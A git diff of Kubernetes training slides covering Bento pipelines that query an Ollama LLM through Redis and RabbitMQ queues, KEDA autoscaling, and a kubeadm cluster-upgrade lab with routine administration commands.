- Check how many cities were loaded:
|
||||
```bash
|
||||
redis-cli -h redis LLEN cities
|
||||
```
|
||||
(There should be 47.)
|
||||
|
||||
---
|
||||
|
||||
## 2️⃣ Consume the queue over HTTP
|
||||
|
||||
- We want to "get the next city" in the queue with a simple `curl`
|
||||
|
||||
- Our input will be `redis_list`
|
||||
|
||||
- Our output will be `http_server`
|
||||
|
||||
---
|
||||
|
||||
## Generate the Bento configuration
|
||||
|
||||
Option 1: `bento create redis_list//http_server`
|
||||
|
||||
Option 2: [read the docs][output-http-server]
|
||||
|
||||
---
|
||||
|
||||
## 🙋 Choose your own adventure
|
||||
|
||||
Do you want to try to write that configuration?
|
||||
|
||||
Or shall we see it right away?
|
||||
|
||||
--
|
||||
|
||||
⚠️ Spoilers on next slide!
|
||||
|
||||
---
|
||||
|
||||
## `redis2http.yaml`
|
||||
|
||||
```yaml
|
||||
input:
|
||||
redis_list:
|
||||
url: redis://redis:`6379`
|
||||
key: cities
|
||||
output:
|
||||
http_server:
|
||||
path: /nextcity
|
||||
```
|
||||
|
||||
This will set up an HTTP route to fetch *one* city.
|
||||
|
||||
It's also possible to batch, stream...
|
||||
|
||||
⚠️ As of November 2024, `bento create` uses port 6397 instead of 6379 for Redis!
|
||||
|
||||
---
|
||||
|
||||
## Trying it out
|
||||
|
||||
- Run Bento with this configuration:
|
||||
```bash
|
||||
bento --config redis2http.yaml &
|
||||
```
|
||||
|
||||
- Retrieve one city:
|
||||
```bash
|
||||
curl http://localhost:4195/nextcity
|
||||
```
|
||||
|
||||
- Check what happens after we retrieve *all* the cities!
|
||||
|
||||
---
|
||||
|
||||
## 3️⃣ Query our LLM for each city
|
||||
|
||||
- We want to ask our LLM who's the mayor of each of these cities
|
||||
|
||||
- We'll use a prompt that will usually ensure a short answer
|
||||
|
||||
(so that it's faster; we don't want to wait 30 seconds per city!)
|
||||
|
||||
- We'll test the prompt with the Ollama CLI
|
||||
|
||||
- Then we'll craft a proper HTTP API query
|
||||
|
||||
- Finally, we'll configure an [enrichment workflow][enrichment] in Bento
|
||||
|
||||
---
|
||||
|
||||
## Test our prompt
|
||||
|
||||
Assuming that our earlier Ollama Deployment is still running:
|
||||
|
||||
```bash
|
||||
kubectl exec deployment/ollama -- \
|
||||
ollama run qwen2:1.5b "
|
||||
Who is the mayor of San Francisco?
|
||||
Just give the name by itself on a single line.
|
||||
If you don't know, don't say anything.
|
||||
"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Turn the prompt into an HTTP API query
|
||||
|
||||
Note: to install `http` in an Alpine container, run `apk add httpie`.
|
||||
|
||||
```bash
|
||||
http http://ollama.default:11434/api/generate \
|
||||
model=qwen2:1.5b stream:=false prompt="
|
||||
Who is the mayor of Paris?
|
||||
Just give the name by itself on a single line.
|
||||
If you don't know, don't say anything.
|
||||
"
|
||||
```
|
||||
|
||||
We get a JSON payload, and we want to use the `response` field.
|
||||
|
||||
---
|
||||
|
||||
## Configure an enrichment workflow
|
||||
|
||||
The [Bento documentation][enrichment] is really good!
|
||||
|
||||
We need to set up:
|
||||
|
||||
- a `branch` processor
|
||||
|
||||
- a `request_map` to transform the city into an Ollama request
|
||||
|
||||
- an `http` processor to submit the request to Ollama
|
||||
|
||||
- a `result_map` to transform the Ollama response
|
||||
|
||||
---
|
||||
|
||||
## Without the `branch` processor
|
||||
|
||||
<pre class="mermaid">
|
||||
flowchart LR
|
||||
|
||||
CITY["
|
||||
city: Paris
|
||||
country: France
|
||||
population: 1106000
|
||||
iso2: FR
|
||||
...
|
||||
"]
|
||||
|
||||
REQ["
|
||||
model: qwen2:1.5b
|
||||
stream: false
|
||||
prompt: Who is the mayor of Paris?
|
||||
"]
|
||||
|
||||
REP["
|
||||
response: Anne Hidalgo
|
||||
eval_count: ...
|
||||
prompt_eval_count: ...
|
||||
(other ollama fields)
|
||||
"]
|
||||
|
||||
CITY@{ shape: card}
|
||||
REQ@{ shape: card}
|
||||
REP@{ shape: card}
|
||||
|
||||
style CITY text-align: left
|
||||
style REQ text-align: left
|
||||
style REP text-align: left
|
||||
|
||||
mapping@{ shape: diam }
|
||||
http["http processor"]@{ shape: diam }
|
||||
|
||||
CITY --> mapping --> REQ --> http --> REP
|
||||
</pre>
|
||||
|
||||
- We transform the `city` into an Ollama request
|
||||
|
||||
- The `http` processor submits the request to Ollama
|
||||
|
||||
- The final output is the Ollama response
|
||||
|
||||
---
|
||||
|
||||
## With the `branch` processor
|
||||
|
||||
<pre class="mermaid">
|
||||
flowchart LR
|
||||
|
||||
CITY["
|
||||
city: Paris
|
||||
country: France
|
||||
population: 1106000
|
||||
iso2: FR
|
||||
...
|
||||
"]
|
||||
|
||||
REQ["
|
||||
model: qwen2:1.5b
|
||||
stream: false
|
||||
prompt: Who is the mayor of Paris?
|
||||
"]
|
||||
|
||||
REP["
|
||||
response: Anne Hidalgo
|
||||
eval_count: ...
|
||||
prompt_eval_count: ...
|
||||
(other ollama fields)
|
||||
"]
|
||||
|
||||
OUT["
|
||||
city: Paris
|
||||
country: France
|
||||
population: 1106000
|
||||
iso2: FR
|
||||
...
|
||||
mayor: Anne Hidalgo
|
||||
"]
|
||||
|
||||
CITY@{ shape: card}
|
||||
REQ@{ shape: card}
|
||||
REP@{ shape: card}
|
||||
OUT@{ shape: card}
|
||||
|
||||
style CITY text-align: left
|
||||
style REQ text-align: left
|
||||
style REP text-align: left
|
||||
style OUT text-align: left
|
||||
|
||||
branch@{ shape: diam }
|
||||
request_map@{ shape: diam }
|
||||
result_map@{ shape: diam }
|
||||
http["http processor"]@{ shape: diam }
|
||||
|
||||
CITY --> branch
|
||||
branch --> result_map
|
||||
branch --> request_map
|
||||
request_map --> REQ
|
||||
REQ --> http
|
||||
http --> REP
|
||||
REP --> result_map
|
||||
result_map --> OUT
|
||||
</pre>
|
||||
|
||||
- The `branch` processor allows doing the processing "on the side"
|
||||
|
||||
- `request_map` and `result_map` transform the message before/after processing
|
||||
|
||||
- Then, the result is combined with the original message (the `city`)
|
||||
|
||||
---
|
||||
|
||||
```yaml
|
||||
input:
|
||||
csv:
|
||||
paths: ["cities.csv"]
|
||||
pipeline:
|
||||
processors:
|
||||
- branch:
|
||||
request_map: |
|
||||
root.model = "qwen2:1.5b"
|
||||
root.stream = false
|
||||
root.prompt = (
|
||||
"Who is the mayor of %s? ".format(this.city) +
|
||||
"Just give the name by itself on a single line. " +
|
||||
"If you don't know, don't say anything."
|
||||
)
|
||||
processors:
|
||||
- http:
|
||||
url: http://ollama:11434/api/generate
|
||||
verb: POST
|
||||
result_map: |
|
||||
root.mayor = this.response
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Trying it out
|
||||
|
||||
- Save the YAML on the previous page into a configuration file
|
||||
|
||||
- Run Bento with that configuration file
|
||||
|
||||
- What happens?
|
||||
|
||||
--
|
||||
|
||||
🤔 We're seeing errors due to timeouts
|
||||
|
||||
```
|
||||
ERRO HTTP request to 'http://ollama...' failed: http://ollama...:
|
||||
Post "http://ollama...": context deadline exceeded
|
||||
(Client.Timeout exceeded while awaiting headers)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 🙋 Choose your own adventure
|
||||
|
||||
How should we address errors?
|
||||
|
||||
- Option 1: increase the timeout in the [http][bento-http] processor
|
||||
|
||||
- Option 2: use a [retry][bento-retry] processor in the pipeline
|
||||
|
||||
- Option 3: use a [reject_errored][bento-reject] output
|
||||
|
||||
---
|
||||
|
||||
## 🏗️ Let's build something!
|
||||
|
||||
- We want to process 1000 cities with our LLM
|
||||
|
||||
(guessing who the mayor is, or something similar)
|
||||
|
||||
- Store the output wherever we want
|
||||
|
||||
(Redis, CSV file, JSONL files...)
|
||||
|
||||
- Deal correctly with errors
|
||||
|
||||
(we'll check that there are, indeed, 1000 cities in the output)
|
||||
|
||||
- Scale out to process faster
|
||||
|
||||
(scale ollama to e.g. 10 replicas, enable parallelism in Bento)
|
||||
|
||||
---
|
||||
|
||||
class: title
|
||||
|
||||
🍱 Lunch time! 🍱
|
||||
|
||||
---
|
||||
|
||||
## What happened?
|
||||
|
||||
- If your Ollama pods have *resource requests*:
|
||||
|
||||
→ your cluster may have auto-scaled
|
||||
|
||||
- If your Ollama pods don't have *resource requests*:
|
||||
|
||||
→ you probably have a bunch of container restarts, due to out-of-memory errors
|
||||
|
||||
🤔 What's that about?
|
||||
|
||||
[bento-http]: https://warpstreamlabs.github.io/bento/docs/components/processors/http/
|
||||
[bento-inputs]: https://warpstreamlabs.github.io/bento/docs/components/inputs/about/
|
||||
[bento-reject]: https://warpstreamlabs.github.io/bento/docs/components/outputs/reject_errored
|
||||
[bento-retry]: https://warpstreamlabs.github.io/bento/docs/components/processors/retry
|
||||
[bento-switch]: https://warpstreamlabs.github.io/bento/docs/components/processors/switch/
|
||||
[enrichment]: https://warpstreamlabs.github.io/bento/cookbooks/enrichments/
|
||||
[output-http-server]: https://warpstreamlabs.github.io/bento/docs/components/outputs/http_server
|
||||
[redpanda-acquires-benthos]: https://www.redpanda.com/press/redpanda-acquires-benthos
|
||||
[warpstream-forks-benthos]: https://www.warpstream.com/blog/announcing-bento-the-open-source-fork-of-the-project-formerly-known-as-benthos
|
||||
|
||||
@@ -1,250 +0,0 @@
|
||||
# Bento & RabbitMQ
|
||||
|
||||
- In some of the previous runs, messages were dropped
|
||||
|
||||
(we start with 1000 messages in `cities` and have e.g. 955 in `mayors`)
|
||||
|
||||
- This is caused by various errors during processing
|
||||
|
||||
(e.g. too many timeouts; Bento being shutdown halfway through...)
|
||||
|
||||
- ...And by the fact that we are using a Redis queue
|
||||
|
||||
(which doesn't offer delivery guarantees or acknowledgements)
|
||||
|
||||
- Can we get something better?
|
||||
|
||||
---
|
||||
|
||||
## The problem
|
||||
|
||||
- Some inputs (like `redis_list`) don't support *acknowledgements*
|
||||
|
||||
- When a message is pulled from the queue, it is deleted immediately
|
||||
|
||||
- If the message is lost for any reason, it is lost permanently
|
||||
|
||||
---
|
||||
|
||||
## The solution
|
||||
|
||||
- Some inputs (like `amqp_0_9`) support acknowledgements
|
||||
|
||||
- When a message is pulled from the queue:
|
||||
|
||||
- it is not visible anymore to other consumers
|
||||
|
||||
- it needs to be explicitly acknowledged
|
||||
|
||||
- The acknowledgement is done by Bento when the message reaches the output
|
||||
|
||||
- The acknowledgement deletes the message
|
||||
|
||||
- No acknowledgement after a while? Consumer crashes/disconnects?
|
||||
|
||||
Message gets requeued automatically!
|
||||
|
||||
---
|
||||
|
||||
## `amqp_0_9`
|
||||
|
||||
- Protocol used by RabbitMQ
|
||||
|
||||
- Very simplified behavior:
|
||||
|
||||
- messages are published to an [*exchange*][amqp-exchanges]
|
||||
|
||||
- messages have a *routing key*
|
||||
|
||||
- the exchange routes the message to one (or zero or more) queues
|
||||
    <br/>(possibly using the routing key or message headers to decide which queue(s))
|
||||
|
||||
- [*consumers*][amqp-consumers] subscribe to queues to receive messages
|
||||
|
||||
[amqp-exchanges]: https://www.rabbitmq.com/tutorials/amqp-concepts#exchanges
|
||||
[amqp-consumers]: https://www.rabbitmq.com/tutorials/amqp-concepts#consumers
|
||||
|
||||
---
|
||||
|
||||
## Using the default exchange
|
||||
|
||||
- There is a default exchange (called `""` - empty string)
|
||||
|
||||
- The routing key indicates the name of the queue to deliver to
|
||||
|
||||
- The queue needs to exist (we need to create it beforehand)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Defining custom exchanges
|
||||
|
||||
- Create an exchange
|
||||
|
||||
- exchange types: direct, fanout, topic, headers
|
||||
|
||||
- durability: persisted to disk to survive server restart or not?
|
||||
|
||||
- Create a binding
|
||||
|
||||
- which exchange?
|
||||
|
||||
- which routing key? (for direct exchanges)
|
||||
|
||||
- which queue?
|
||||
|
||||
---
|
||||
|
||||
## RabbitMQ on Kubernetes
|
||||
|
||||
- RabbitMQ can be deployed on Kubernetes:
|
||||
|
||||
- directly (creating e.g. a StatefulSet)
|
||||
|
||||
- with the RabbitMQ operator
|
||||
|
||||
- We're going to do the latter!
|
||||
|
||||
- The operator includes the "topology operator"
|
||||
|
||||
(to configure queues, exchanges, and bindings through custom resources)
|
||||
|
||||
---
|
||||
|
||||
## Installing the RabbitMQ operator
|
||||
|
||||
- Let's install it with this Helm chart:
|
||||
|
||||
```bash
|
||||
helm upgrade --install --repo https://charts.bitnami.com/bitnami \
|
||||
--namespace rabbitmq-system --create-namespace \
|
||||
rabbitmq-cluster-operator rabbitmq-cluster-operator
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Deploying a simple RabbitMQ cluster
|
||||
|
||||
- Let's use the YAML manifests in that directory:
|
||||
|
||||
https://github.com/jpetazzo/beyond-load-balancers/tree/main/rabbitmq
|
||||
|
||||
- This creates:
|
||||
|
||||
- a `RabbitmqCluster` called `mq`
|
||||
|
||||
- a `Secret` called `mq-default-user` containing access credentials
|
||||
|
||||
- a durable `Queue` named `q1`
|
||||
|
||||
(We can ignore the `Exchange` and the `Binding`, we won't use them.)
|
||||
|
||||
---
|
||||
|
||||
## 🏗️ Let's build something!
|
||||
|
||||
Let's replace the `cities` Redis list with our RabbitMQ queue.
|
||||
|
||||
(See next slide for steps and hints!)
|
||||
|
||||
---
|
||||
|
||||
## Steps
|
||||
|
||||
1. Edit the Bento configuration for our "CSV importer".
|
||||
|
||||
(replace the `redis_list` output with `amqp_0_9`)
|
||||
|
||||
2. Run that pipeline and confirm that messages show up in RabbitMQ.
|
||||
|
||||
3. Edit the Bento configuration for the Ollama consumer.
|
||||
|
||||
(replace the `redis_list` input with `amqp_0_9`)
|
||||
|
||||
4. Trigger a scale up of the Ollama consumer.
|
||||
|
||||
5. Update the KEDA Scaler to use RabbitMQ instead of Redis.
|
||||
|
||||
---
|
||||
|
||||
## 1️⃣ Sending messages to RabbitMQ
|
||||
|
||||
- Edit our Bento configuration (the one feeding the CSV file to Redis)
|
||||
|
||||
- We want the following `output` section:
|
||||
```yaml
|
||||
output:
|
||||
amqp_0_9:
|
||||
exchange: ""
|
||||
key: q1
|
||||
mandatory: true
|
||||
urls:
|
||||
- "${AMQP_URL}"
|
||||
```
|
||||
|
||||
- Then export the AMQP_URL environment variable using `connection_string` from Secret `mq-default-user`
|
||||
|
||||
💡 Yes, we can directly use environment variables in Bento configuration!
|
||||
|
||||
---
|
||||
|
||||
## 2️⃣ Testing our AMQP output
|
||||
|
||||
- Run the Bento pipeline
|
||||
|
||||
- To check that our messages made it:
|
||||
```bash
|
||||
kubectl exec mq-server-0 -- rabbitmqctl list_queues
|
||||
```
|
||||
|
||||
- We can also use Prometheus metrics, e.g. `rabbitmq_queue_messages`
|
||||
|
||||
---
|
||||
|
||||
## 3️⃣ Receiving messages from RabbitMQ
|
||||
|
||||
- Edit our other Bento configuration (the one in the Ollama consumer Pod)
|
||||
|
||||
- We want the following `input` section:
|
||||
```yaml
|
||||
input:
|
||||
amqp_0_9:
|
||||
urls:
|
||||
- `amqp://...:5672/`
|
||||
queue: q1
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 4️⃣ Triggering Ollama scale up
|
||||
|
||||
- If the autoscaler is configured to scale to zero, disable it
|
||||
|
||||
(easiest solution: delete the ScaledObject)
|
||||
|
||||
- Then manually scale the Deployment to e.g. 4 Pods
|
||||
|
||||
- Check that messages are processed and show up in the output
|
||||
|
||||
(it should still be a Redis list at this point)
|
||||
|
||||
---
|
||||
|
||||
## 5️⃣ Autoscaling on RabbitMQ
|
||||
|
||||
- We need to update our ScaledObject
|
||||
|
||||
- Check the [RabbitMQ Queue Scaler][keda-rabbitmq]
|
||||
|
||||
- Multiple ways to pass the AMQP URL:
|
||||
|
||||
- hardcode it (easier solution for testing!)
|
||||
|
||||
- use `...fromEnv` and set environment variables in target pod
|
||||
|
||||
- create and use a TriggerAuthentication
|
||||
|
||||
💡 Since we have the AMQP URL in a Secret, TriggerAuthentication works great!
|
||||
|
||||
[keda-rabbitmq]: https://keda.sh/docs/latest/scalers/rabbitmq-queue/
|
||||
@@ -55,7 +55,6 @@
|
||||
|
||||
`cert-manager.io/allow-direct-injection: "true"`
|
||||
|
||||
- See [cert-manager documentation] for details
|
||||
|
||||
[cert-manager documentation]: https://cert-manager.io/docs/concepts/ca-injector/
|
||||
- See [cert-manager documentation][docs] for details
|
||||
|
||||
[docs]: https://cert-manager.io/docs/concepts/ca-injector/
|
||||
|
||||
@@ -272,9 +272,9 @@ This can be overridden by setting the annotation:
|
||||
|
||||
- Can express `minAvailable` or `maxUnavailable`
|
||||
|
||||
- See [documentation][doc-pdb] for details and examples
|
||||
- See [documentation] for details and examples
|
||||
|
||||
[doc-pdb]: https://kubernetes.io/docs/tasks/run-application/configure-pdb/
|
||||
[documentation]: https://kubernetes.io/docs/tasks/run-application/configure-pdb/
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -81,7 +81,7 @@
|
||||
|
||||
## What version are we running anyway?
|
||||
|
||||
- When I say, "I'm running Kubernetes 1.28", is that the version of:
|
||||
- When I say, "I'm running Kubernetes 1.22", is that the version of:
|
||||
|
||||
- kubectl
|
||||
|
||||
@@ -111,73 +111,6 @@
|
||||
|
||||
---
|
||||
|
||||
## Important questions
|
||||
|
||||
- Should we upgrade the control plane before or after the kubelets?
|
||||
|
||||
- Within the control plane, should we upgrade the API server first or last?
|
||||
|
||||
- How often should we upgrade?
|
||||
|
||||
- How long are versions maintained?
|
||||
|
||||
- All the answers are in [the documentation about version skew policy](https://kubernetes.io/docs/setup/release/version-skew-policy/)!
|
||||
|
||||
- Let's review the key elements together ...
|
||||
|
||||
---
|
||||
|
||||
## Kubernetes uses semantic versioning
|
||||
|
||||
- Kubernetes versions look like MAJOR.MINOR.PATCH; e.g. in 1.28.9:
|
||||
|
||||
- MAJOR = 1
|
||||
- MINOR = 28
|
||||
- PATCH = 9
|
||||
|
||||
- It's always possible to mix and match different PATCH releases
|
||||
|
||||
(e.g. 1.28.9 and 1.28.13 are compatible)
|
||||
|
||||
- It is recommended to run the latest PATCH release
|
||||
|
||||
(but it's mandatory only when there is a security advisory)
|
||||
|
||||
---
|
||||
|
||||
## Version skew
|
||||
|
||||
- API server must be more recent than its clients (kubelet and control plane)
|
||||
|
||||
- ... Which means it must always be upgraded first
|
||||
|
||||
- All components support a difference of one¹ MINOR version
|
||||
|
||||
- This allows live upgrades (since we can mix e.g. 1.28 and 1.29)
|
||||
|
||||
- It also means that going from 1.28 to 1.30 requires going through 1.29
|
||||
|
||||
.footnote[¹Except kubelet, which can be up to two MINOR behind API server,
|
||||
and kubectl, which can be one MINOR ahead or behind API server.]
|
||||
|
||||
---
|
||||
|
||||
## Release cycle
|
||||
|
||||
- There is a new PATCH release whenever necessary
|
||||
|
||||
(every few weeks, or "ASAP" when there is a security vulnerability)
|
||||
|
||||
- There is a new MINOR release every 3 months (approximately)
|
||||
|
||||
- At any given time, three MINOR releases are maintained
|
||||
|
||||
- ... Which means that MINOR releases are maintained approximately 9 months
|
||||
|
||||
- We should expect to upgrade at least every 3 months (on average)
|
||||
|
||||
---
|
||||
|
||||
## General guidelines
|
||||
|
||||
- To update a component, use whatever was used to install it
|
||||
@@ -206,6 +139,73 @@ and kubectl, which can be one MINOR ahead or behind API server.]
|
||||
|
||||
---
|
||||
|
||||
## Important questions
|
||||
|
||||
- Should we upgrade the control plane before or after the kubelets?
|
||||
|
||||
- Within the control plane, should we upgrade the API server first or last?
|
||||
|
||||
- How often should we upgrade?
|
||||
|
||||
- How long are versions maintained?
|
||||
|
||||
- All the answers are in [the documentation about version skew policy](https://kubernetes.io/docs/setup/release/version-skew-policy/)!
|
||||
|
||||
- Let's review the key elements together ...
|
||||
|
||||
---
|
||||
|
||||
## Kubernetes uses semantic versioning
|
||||
|
||||
- Kubernetes versions look like MAJOR.MINOR.PATCH; e.g. in 1.22.17:
|
||||
|
||||
- MAJOR = 1
|
||||
- MINOR = 22
|
||||
- PATCH = 17
|
||||
|
||||
- It's always possible to mix and match different PATCH releases
|
||||
|
||||
(e.g. 1.22.17 and 1.22.5 are compatible)
|
||||
|
||||
- It is recommended to run the latest PATCH release
|
||||
|
||||
(but it's mandatory only when there is a security advisory)
|
||||
|
||||
---
|
||||
|
||||
## Version skew
|
||||
|
||||
- API server must be more recent than its clients (kubelet and control plane)
|
||||
|
||||
- ... Which means it must always be upgraded first
|
||||
|
||||
- All components support a difference of one¹ MINOR version
|
||||
|
||||
- This allows live upgrades (since we can mix e.g. 1.22 and 1.23)
|
||||
|
||||
- It also means that going from 1.22 to 1.24 requires going through 1.23
|
||||
|
||||
.footnote[¹Except kubelet, which can be up to two MINOR behind API server,
|
||||
and kubectl, which can be one MINOR ahead or behind API server.]
|
||||
|
||||
---
|
||||
|
||||
## Release cycle
|
||||
|
||||
- There is a new PATCH release whenever necessary
|
||||
|
||||
(every few weeks, or "ASAP" when there is a security vulnerability)
|
||||
|
||||
- There is a new MINOR release every 3 months (approximately)
|
||||
|
||||
- At any given time, three MINOR releases are maintained
|
||||
|
||||
- ... Which means that MINOR releases are maintained approximately 9 months
|
||||
|
||||
- We should expect to upgrade at least every 3 months (on average)
|
||||
|
||||
---
|
||||
|
||||
## In practice
|
||||
|
||||
- We are going to update a few cluster components
|
||||
@@ -254,7 +254,7 @@ and kubectl, which can be one MINOR ahead or behind API server.]
|
||||
sudo vim /etc/kubernetes/manifests/kube-apiserver.yaml
|
||||
```
|
||||
|
||||
- Look for the `image:` line, and update it to e.g. `v1.30.1`
|
||||
- Look for the `image:` line, and update it to e.g. `v1.24.1`
|
||||
|
||||
]
|
||||
|
||||
@@ -320,29 +320,53 @@ Note 2: kubeadm itself is still version 1.22.1..
|
||||
|
||||
- First things first: we need to upgrade kubeadm
|
||||
|
||||
- The Kubernetes package repositories are now split by minor versions
|
||||
.lab[
|
||||
|
||||
(i.e. there is one repository for 1.28, another for 1.29, etc.)
|
||||
- Upgrade kubeadm:
|
||||
```
|
||||
sudo apt install kubeadm=1.27.0-00
|
||||
```
|
||||
|
||||
- This avoids accidentally upgrading from one minor version to another
|
||||
- Check what kubeadm tells us:
|
||||
```
|
||||
sudo kubeadm upgrade plan
|
||||
```
|
||||
|
||||
(e.g. with unattended upgrades or if packages haven't been held/pinned)
|
||||
]
|
||||
|
||||
- We'll need to add the new package repository and unpin packages!
|
||||
Problem: kubeadm doesn't know how to handle
|
||||
upgrades from version 1.22.
|
||||
|
||||
This is because we installed version 1.27.
|
||||
|
||||
We need to install kubeadm version 1.23.X.
|
||||
|
||||
---
|
||||
|
||||
## Installing the new packages
|
||||
## Downgrading kubeadm
|
||||
|
||||
- Edit `/etc/apt/sources.list.d/kubernetes.list`
|
||||
- We need to go back to kubeadm version 1.23.X.
|
||||
|
||||
(or copy it to e.g. `kubernetes-1.29.list` and edit that)
|
||||
.lab[
|
||||
|
||||
- `apt-get update`
|
||||
- View available versions for package `kubeadm`:
|
||||
```bash
|
||||
apt show kubeadm -a | grep ^Version | grep 1.23
|
||||
```
|
||||
|
||||
- Now edit (or remove) `/etc/apt/preferences.d/kubernetes`
|
||||
- Downgrade kubeadm:
|
||||
```
|
||||
sudo apt install kubeadm=1.23.0-00
|
||||
```
|
||||
|
||||
- `apt-get install kubeadm` should now upgrade `kubeadm` correctly! 🎉
|
||||
- Check what kubeadm tells us:
|
||||
```
|
||||
sudo kubeadm upgrade plan
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
kubeadm should now agree to upgrade to 1.23.X.
|
||||
|
||||
---
|
||||
|
||||
@@ -361,7 +385,7 @@ Note 2: kubeadm itself is still version 1.22.1..
|
||||
|
||||
- Look for the `image:` line, and restore it to the original value
|
||||
|
||||
(e.g. `v1.28.9`)
|
||||
(e.g. `v1.22.17`)
|
||||
|
||||
- Wait for the control plane to come back up
|
||||
|
||||
@@ -375,14 +399,9 @@ Note 2: kubeadm itself is still version 1.22.1..
|
||||
|
||||
.lab[
|
||||
|
||||
- Check the upgrade plan:
|
||||
```bash
|
||||
sudo kubeadm upgrade plan
|
||||
```
|
||||
|
||||
- Perform the upgrade:
|
||||
```bash
|
||||
sudo kubeadm upgrade apply v1.29.0
|
||||
sudo kubeadm upgrade apply v1.23.0
|
||||
```
|
||||
|
||||
]
|
||||
@@ -399,9 +418,15 @@ Note 2: kubeadm itself is still version 1.22.1..
|
||||
|
||||
- Log into node `oldversion2`
|
||||
|
||||
- Update package lists and APT pins like we did before
|
||||
- View available versions for package `kubelet`:
|
||||
```bash
|
||||
apt show kubelet -a | grep ^Version
|
||||
```
|
||||
|
||||
- Then upgrade kubelet
|
||||
- Upgrade kubelet:
|
||||
```bash
|
||||
sudo apt install kubelet=1.23.0-00
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
@@ -454,16 +479,13 @@ Note 2: kubeadm itself is still version 1.22.1..
|
||||
|
||||
.lab[
|
||||
|
||||
- Execute the whole upgrade procedure on each node:
|
||||
- Download the configuration on each node, and upgrade kubelet:
|
||||
```bash
|
||||
for N in 1 2 3; do
|
||||
ssh oldversion$N "
|
||||
sudo sed -i s/1.28/1.29/ /etc/apt/sources.list.d/kubernetes.list &&
|
||||
sudo rm /etc/apt/preferences.d/kubernetes &&
|
||||
sudo apt update &&
|
||||
sudo apt install kubeadm -y &&
|
||||
sudo apt install kubeadm=1.23.0-00 &&
|
||||
sudo kubeadm upgrade node &&
|
||||
sudo apt install kubelet -y"
|
||||
sudo apt install kubelet=1.23.0-00"
|
||||
done
|
||||
```
|
||||
]
|
||||
@@ -472,7 +494,7 @@ Note 2: kubeadm itself is still version 1.22.1..
|
||||
|
||||
## Checking what we've done
|
||||
|
||||
- All our nodes should now be updated to version 1.29
|
||||
- All our nodes should now be updated to version 1.23.0
|
||||
|
||||
.lab[
|
||||
|
||||
@@ -485,115 +507,17 @@ Note 2: kubeadm itself is still version 1.22.1..
|
||||
|
||||
---
|
||||
|
||||
## And now, was that a good idea?
|
||||
|
||||
--
|
||||
|
||||
**Almost!**
|
||||
|
||||
--
|
||||
|
||||
- The official recommendation is to *drain* a node before performing node maintenance
|
||||
|
||||
(migrate all workloads off the node before upgrading it)
|
||||
|
||||
- How do we do that?
|
||||
|
||||
- Is it really necessary?
|
||||
|
||||
- Let's see!
|
||||
|
||||
---
|
||||
|
||||
## Draining a node
|
||||
|
||||
- This can be achieved with the `kubectl drain` command, which will:
|
||||
|
||||
- *cordon* the node (prevent new pods from being scheduled there)
|
||||
|
||||
- *evict* all the pods running on the node (delete them gracefully)
|
||||
|
||||
- the evicted pods will automatically be recreated somewhere else
|
||||
|
||||
- evictions might be blocked in some cases (Pod Disruption Budgets, `emptyDir` volumes)
|
||||
|
||||
- Once the node is drained, it can safely be upgraded, restarted...
|
||||
|
||||
- Once it's ready, it can be put back in commission with `kubectl uncordon`
|
||||
|
||||
---
|
||||
|
||||
## Is it necessary?
|
||||
|
||||
- When upgrading kubelet from one patch-level version to another:
|
||||
|
||||
- it's *probably fine*
|
||||
|
||||
- When upgrading system packages:
|
||||
|
||||
- it's *probably fine*
|
||||
|
||||
- except [when it's not][datadog-systemd-outage]
|
||||
|
||||
- When upgrading the kernel:
|
||||
|
||||
- it's *probably fine*
|
||||
|
||||
- ...as long as we can tolerate a restart of the containers on the node
|
||||
|
||||
- ...and that they will be unavailable for a few minutes (during the reboot)
|
||||
|
||||
[datadog-systemd-outage]: https://www.datadoghq.com/blog/engineering/2023-03-08-deep-dive-into-platform-level-impact/
|
||||
|
||||
---
|
||||
|
||||
## Is it necessary?
|
||||
|
||||
- When upgrading kubelet from one minor version to another:
|
||||
|
||||
- it *may or may not be fine*
|
||||
|
||||
- in some cases (e.g. migrating from Docker to containerd) it *will not*
|
||||
|
||||
- Here's what [the documentation][node-upgrade-docs] says:
|
||||
|
||||
*Draining nodes before upgrading kubelet ensures that pods are re-admitted and containers are re-created, which may be necessary to resolve some security issues or other important bugs.*
|
||||
|
||||
- Do it at your own risk, and if you do, test extensively in staging environments!
|
||||
|
||||
[node-upgrade-docs]: https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/#manual-deployments
|
||||
|
||||
---
|
||||
|
||||
## Database operators to the rescue
|
||||
|
||||
- Moving stateful pods (e.g.: database server) can cause downtime
|
||||
|
||||
- Database replication can help:
|
||||
|
||||
- if a node contains database servers, we make sure these servers aren't primaries
|
||||
|
||||
- if they are primaries, we execute a *switch over*
|
||||
|
||||
- Some database operators (e.g. [CNPG]) will do that switch over automatically
|
||||
|
||||
(when they detect that a node has been *cordoned*)
|
||||
|
||||
[CNPG]: https://cloudnative-pg.io/
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Skipping versions
|
||||
|
||||
- This example worked because we went from 1.28 to 1.29
|
||||
- This example worked because we went from 1.22 to 1.23
|
||||
|
||||
- If you are upgrading from e.g. 1.26, you will have to go through 1.27 first
|
||||
- If you are upgrading from e.g. 1.21, you will have to go through 1.22 first
|
||||
|
||||
- This means upgrading kubeadm to 1.27.X, then using it to upgrade the cluster
|
||||
- This means upgrading kubeadm to 1.22.X, then using it to upgrade the cluster
|
||||
|
||||
- Then upgrading kubeadm to 1.28.X, etc.
|
||||
- Then upgrading kubeadm to 1.23.X, etc.
|
||||
|
||||
- **Make sure to read the release notes before upgrading!**
|
||||
|
||||
|
||||
@@ -225,4 +225,4 @@ consul agent -data-dir=/consul/data -client=0.0.0.0 -server -ui \
|
||||
:EN:- Scheduling pods together or separately
|
||||
:EN:- Example: deploying a Consul cluster
|
||||
:FR:- Lancer des pods ensemble ou séparément
|
||||
:FR:- Exemple : lancer un cluster Consul
|
||||
:FR:- Exemple : lancer un cluster Consul
|
||||
|
||||
@@ -24,32 +24,6 @@
|
||||
|
||||
---
|
||||
|
||||
## A bit of history
|
||||
|
||||
Things related to Custom Resource Definitions:
|
